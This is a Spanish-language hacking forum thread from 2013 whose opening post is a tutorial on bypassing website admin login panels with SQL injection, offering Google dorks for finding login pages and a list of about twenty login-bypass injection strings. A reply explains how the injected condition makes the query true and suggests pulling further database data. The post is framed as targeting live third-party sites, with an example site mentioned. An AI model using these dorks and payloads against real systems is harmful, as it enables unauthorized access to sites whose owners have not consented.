comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SQL] Bypass Admin Panel

  • 3 Respuestas
  • 4099 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado Assed [In]Seguridad Informática

  • *
  • Underc0der
  • Mensajes: 42
  • Actividad:
    0%
  • Reputación 0
  • ASSED Lab's
    • Ver Perfil
    • Email
  • Skype: @Pep.Juan
« en: Julio 30, 2013, 11:58:38 pm »
Bueno como dice hoy are un tutorial sobre el bypass admin panel (SQL) ,es decir, bypasear  panel (admin)


algunos dorks


Dorks :


inurl:adminlogin.aspx
 inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp


lo aremos con una simple consulta SQL
,,,

Acá una imagen (mía)




algunos tipos de consultas :

‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –


Sitio que use de ejemplo : You are not allowed to view links. Register or Login

Bueno Un saludo Undercode  ;)
« Última modificación: Julio 31, 2013, 12:01:16 am por Assed [In]Seguridad Informática »
Passion informatic.

Desconectado nuk3rb0mb

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Agosto 13, 2015, 06:35:19 pm »
Te hago una pregunta porque recien me estoy iniciando en este tema. Hacer esto en el adminlogin, de que sirve? Se que ahi estas tirando un true-false (en tu caso un 1 o "todas las verdaderas"). Pero que se obtiene de resultado? para que sirve? Que es lo que se puede conseguir?

Se entiende mi pregunta?
Saludos

Desconectado blood_rec

  • *
  • Underc0der
  • Mensajes: 50
  • Actividad:
    0%
  • Reputación 0
  • From no0b to ro0t in 5 seconds :)
    • Ver Perfil
    • H4x0r Security Group
« Respuesta #2 en: Agosto 13, 2015, 06:46:59 pm »
wow revivir un post de hace 24 meses

salu2

hermano date una vuelta en el buscador del foro de como funcionan las consultas de SQL que es una inyeccion SQL primero antes de ejecutar "ataques con dorks"  ::)

  • you're so n00b and still reading this lmaoo!!
  • observo mucho creido y no se saben ni limpiar ni el culillo
You are not allowed to view links. Register or Login

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 365
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #3 en: Agosto 14, 2015, 12:22:54 am »
@You are not allowed to view links. Register or Login blood_rec tiene razón, la próxima vez que tengas una duda la puedes postear en el foro "Dudas y pedidos generales".
Y sobre tu duda, esta inyección SQL es por post en el form de logeo y básicamente lo que hace es dar por correcta la sentencia ingresada como clave, ya que uno es igual a uno quedando la consulta asi:

Código: MySQL
  1. You are not allowed to view links. Register or Login * You are not allowed to view links. Register or Login users
  2. You are not allowed to view links. Register or Login name='admin'
  3. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login='' You are not allowed to view links. Register or Login '1'='1'

y dando el OK  te da acceso al panel, esta técnica se conoce como Login Bypass y es muy vieja.

P/D: También se podría prepara una sentencia mejor, inyectarla y hacer que nos devuelva algunos datos de  la DB más interesantes que un simple bypass.

Saludos!

 

¿Te gustó el post? COMPARTILO!